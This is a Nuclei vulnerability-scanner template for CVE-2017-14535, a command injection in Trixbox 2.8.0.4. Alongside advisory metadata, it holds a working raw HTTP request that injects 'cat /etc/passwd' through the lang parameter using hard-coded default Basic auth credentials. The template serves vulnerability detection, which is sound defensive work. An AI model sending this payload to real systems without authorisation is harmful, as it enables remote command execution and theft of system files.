nuclei-templates/http/cves/2017/CVE-2017-14535.yaml

52 lines
2.1 KiB
YAML

id: CVE-2017-14535
info:
name: Trixbox - 2.8.0.4 OS Command Injection
author: pikpikcu
severity: high
description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
remediation: |
Upgrade to a patched version of Trixbox or apply the necessary security patches provided by the vendor.
reference:
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913
- https://nvd.nist.gov/vuln/detail/CVE-2017-14535
- https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t
- https://twitter.com/tiger_tigerboy/status/962689803270500352
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2017-14535
cwe-id: CWE-78
epss-score: 0.04456
epss-percentile: 0.91577
cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: netfortris
product: trixbox
tags: cve,cve2017,trixbox,rce,injection,edb,netfortris
http:
- raw:
- |
GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: close
Cache-Control: max-age=0
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a00463044022004c2c0b0bfc6a4b5299eb051ed30519d948e89244430b213fad2de42968d5d0602207a33257c46086bb05aa71c1e223813644d52d434ee6d268a0c78b20851101d53:922c64590222798bb761d5b6d8e72950